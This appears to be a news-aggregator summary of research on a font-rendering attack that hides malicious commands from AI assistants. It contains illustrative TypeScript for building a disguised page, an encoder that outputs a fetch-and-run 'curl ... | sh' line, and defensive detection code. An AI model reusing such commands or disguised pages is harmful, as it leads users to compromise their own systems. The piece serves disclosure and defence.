AI & Security · HIGH

AI Security - New Font-Rendering Attack Exposed

BleepingComputer · Reporting by Bill Toulas
📰 3 sources · Summary by CyberPings Editorial · AI-assisted · Reviewed by Rohit Rana
🎯 Basically, attackers hide harmful commands in web pages so AI tools can't see them.

Quick Summary

A newly disclosed font-rendering attack hides malicious commands from AI assistants: the assistant reads a page as harmless while the user sees instructions that can compromise their system. This poses serious risks to anyone who trusts these tools to vet content. Stay alert and verify commands before executing them.

What Happened

Researchers at LayerX have disclosed a font-rendering attack that hides malicious instructions from AI assistants. Their proof-of-concept demonstrates how attackers can use custom fonts and CSS to conceal harmful instructions within seemingly harmless HTML. The technique relies heavily on social engineering, tricking users into executing commands that could compromise their systems while the AI assistant vouches for the page.
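
LayerX has not published full exploit code, but the shape of the trick can be sketched. The fragment below is a hypothetical illustration rather than the actual proof-of-concept: it writes out a page whose raw text is meaningless to any parser, while an attacker-supplied font (the file name remap.woff2 and the scrambled text are our inventions) would render those same characters to the visitor as a readable command.

```typescript
import { writeFileSync } from "node:fs";

// Hypothetical sketch of the page structure described in the report. The
// font "remap.woff2" is assumed to map each raw character to the glyph of
// a different letter, so the visitor reads a command the DOM never contains.
const poisonedPage = `<!doctype html>
<style>
  @font-face {
    font-family: "remap";
    src: url("remap.woff2"); /* attacker font with a shuffled glyph table */
  }
  .instructions { font-family: "remap", monospace; }
</style>
<p>To claim your reward, run the command below in a terminal:</p>
<!-- Gibberish to an AI assistant reading the raw HTML; the shuffled glyphs
     render it to the human as a real (malicious) shell command. -->
<p class="instructions">exks izzhl://tbqdhst.egd/kxf.li | li</p>`;

writeFileSync("poc.html", poisonedPage);
```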

The attack exploits the gap between how AI assistants analyze a webpage and how browsers render it. AI tools read only the underlying text, while users see the rendered glyphs, which can spell out malicious content the raw characters never contain. This disconnect can lead to dangerous recommendations from AI assistants, which fail to recognize the hidden threats embedded in the page's design.
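
One crude way to surface that disconnect in the browser, sketched here as our own heuristic rather than any published tool, is to flag visible text styled with a font the page itself supplies, since the attack depends on an attacker-controlled glyph table:

```typescript
// Our own heuristic, not a published detector: collect the font families
// the page embeds via @font-face, then flag visible text styled with one
// of them, because such text may not read the way it is written.
function embeddedFontFamilies(): Set<string> {
  const families = new Set<string>();
  for (const sheet of Array.from(document.styleSheets)) {
    let rules: CSSRuleList;
    try {
      rules = sheet.cssRules; // cross-origin stylesheets throw; skip them
    } catch {
      continue;
    }
    for (const rule of Array.from(rules)) {
      if (rule instanceof CSSFontFaceRule) {
        const family = rule.style.getPropertyValue("font-family");
        families.add(family.replace(/["']/g, "").trim().toLowerCase());
      }
    }
  }
  return families;
}

function flagRemappedText(): HTMLElement[] {
  const embedded = embeddedFontFamilies();
  const flagged: HTMLElement[] = [];
  for (const el of Array.from(document.querySelectorAll<HTMLElement>("body *"))) {
    if (!el.innerText.trim()) continue;
    const first = getComputedStyle(el)
      .fontFamily.split(",")[0]
      .replace(/["']/g, "").trim().toLowerCase();
    if (embedded.has(first)) flagged.push(el);
  }
  return flagged;
}

console.log(flagRemappedText());
```

Nearly every modern site legitimately embeds webfonts, so a filter this blunt would drown in false positives; a serious detector would need to compare what the glyphs actually draw against the underlying characters, which is the rendered-versus-raw comparison LayerX recommends below.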

Who's Affected

As of December 2025, multiple popular AI assistants were vulnerable to this attack, including ChatGPT, Claude, and Copilot. Users of these platforms may unknowingly execute harmful commands, believing them to be safe due to the AI's reassuring responses. The potential for widespread exploitation raises concerns about the effectiveness of current safeguards in AI systems.

LayerX's findings indicate that this attack could significantly undermine user trust in AI technologies. If users cannot rely on AI assistants to accurately assess the safety of commands, they may hesitate to use these tools altogether, impacting the adoption of AI solutions across various sectors.

What Data Was Exposed

The primary risk here is not a data breach but command execution: hidden instructions can lead a victim to perform malicious actions, such as opening a reverse shell on their own machine. The commands are encoded so that they are unreadable to AI tools yet perfectly legible to users. While the AI assistant reports only benign content, the user may be carrying out harmful instructions without realizing it.
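
The encoding itself can be as simple as a fixed character substitution. The toy below is our own construction (LayerX's actual mapping is not public); it produces exactly the kind of string used in the page sketch above, noise to a text-only scanner but one glyph-table inversion away from a live command.

```typescript
// Toy substitution cipher (our construction, not LayerX's actual scheme).
// The page stores encode("curl ...") as its raw text; a custom font whose
// glyph table applies the inverse mapping shows the user the original.
const PLAIN = "abcdefghijklmnopqrstuvwxyz";
const SUBST = "qwertyuiopasdfghjklzxcvbnm";

function encode(text: string): string {
  return [...text]
    .map((ch) => {
      const i = PLAIN.indexOf(ch.toLowerCase());
      return i === -1 ? ch : SUBST[i]; // digits and punctuation pass through
    })
    .join("");
}

console.log(encode("curl https://example.com/run.sh | sh"));
// -> exks izzhl://tbqdhst.egd/kxf.li | li   (all an AI text parser sees)
```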

LayerX's report emphasizes that the attack does not require a significant breach of data but instead manipulates the existing trust users place in AI assistants. This manipulation can lead to a variety of security incidents, depending on the nature of the commands executed by the user.

What You Should Do

To protect yourself from this emerging threat, users should exercise caution when interacting with AI assistants and executing commands from web pages. It's crucial to verify the safety of instructions independently rather than relying solely on AI assessments. LayerX recommends that AI vendors enhance their systems by analyzing both the rendered page and the underlying HTML to better detect discrepancies that could indicate malicious intent.
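
What such a discrepancy check could look like, with tooling of our own choosing (the report names neither Playwright nor tesseract.js): render the page, OCR the pixels, and compare what a user would read against what the HTML actually says.

```typescript
import { chromium } from "playwright";
import { createWorker } from "tesseract.js";

// Sketch of the rendered-versus-raw comparison LayerX recommends, under our
// own choice of tools. A score near 1 means users see words that the page's
// underlying text never contained (the signature this attack leaves).
async function textDiscrepancy(url: string): Promise<number> {
  const browser = await chromium.launch();
  const page = await browser.newPage();
  await page.goto(url, { waitUntil: "networkidle" });

  const domText = await page.evaluate(() => document.body.innerText);
  const screenshot = await page.screenshot({ fullPage: true });
  await browser.close();

  const worker = await createWorker("eng");
  const { data } = await worker.recognize(screenshot);
  await worker.terminate();

  // Crude similarity: the share of OCR'd words missing from the DOM text.
  const domWords = new Set(domText.toLowerCase().split(/\s+/));
  const ocrWords = data.text.toLowerCase().split(/\s+/).filter(Boolean);
  const matched = ocrWords.filter((w) => domWords.has(w)).length;
  return ocrWords.length ? 1 - matched / ocrWords.length : 0;
}

textDiscrepancy("https://example.com").then(console.log);
```

OCR is noisy, so any real threshold would have to be loose; the point is only that the comparison is mechanically feasible.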

Additionally, users should be aware that AI tools may not have safeguards against all forms of social engineering. As a best practice, always question the legitimacy of commands, especially those promising rewards or incentives. By staying informed and vigilant, users can mitigate the risks associated with such attacks.

🔒 Pro insight: This attack highlights the urgent need for AI systems to integrate visual content analysis to prevent exploitation through social engineering tactics.

Original article from

BleepingComputer · Bill Toulas

Also covered by

SC Media

Novel font-rendering attack prevents AI assistants from detecting illicit code

Malwarebytes Labs

Researchers found font-rendering trick to hide malicious commands

Cyber Security News

Simple Custom Font Rendering Can Poison ChatGPT, Claude, Gemini, and Other AI Systems


Related Pings

MEDIUM · AI & Security

Cybersecurity Veteran Mikko Hyppönen Now Hacking Drones

Mikko Hyppönen, a cybersecurity pioneer, is now tackling the threats posed by drones. His shift from fighting malware to drone defense highlights the evolving landscape of cybersecurity. With increasing drone use in conflicts, understanding these threats is crucial for safety.

TechCrunch Security

HIGH · AI & Security

Anthropic Ends Claude Subscriptions for Third-Party Tools

Anthropic has halted third-party access to Claude subscriptions, significantly affecting users of tools like OpenClaw. This shift raises costs and limits integration options, leading to dissatisfaction among developers. Users must now adapt to new billing structures or seek refunds.

Cyber Security News

MEDIUM · AI & Security

Intent-Based AI Security - Sumit Dhawan Explains Importance

Sumit Dhawan highlights the importance of intent-based AI security in modern cybersecurity. This approach enhances threat detection and response, helping organizations stay ahead of cyber threats. Understanding user intent could redefine security strategies in the future.

Proofpoint Threat Insight

MEDIUM · AI & Security

XR Headset Authentication - Skull Vibrations Explained

Emerging research shows that skull vibrations can be used for authenticating users on XR headsets. This could enhance security and user experience significantly. As XR technology evolves, expect more innovations in biometric authentication methods.

Dark Reading

HIGH · AI & Security

APERION Launches SmartFlow SDK for Secure AI Governance

APERION has launched the SmartFlow SDK, providing a secure on-premises solution for AI governance. This comes after the LiteLLM supply chain attack raised concerns among enterprises. As organizations reassess their AI infrastructures, SmartFlow offers a reliable alternative to cloud dependencies.

Help Net Security

MEDIUM · AI & Security

Microsoft's Open-Source Toolkit for Autonomous AI Governance

Microsoft has released the Agent Governance Toolkit, an open-source solution for managing autonomous AI agents. This toolkit enhances governance and compliance, ensuring responsible AI use. It's designed to integrate with popular frameworks, making it easier for developers to adopt.

Help Net Security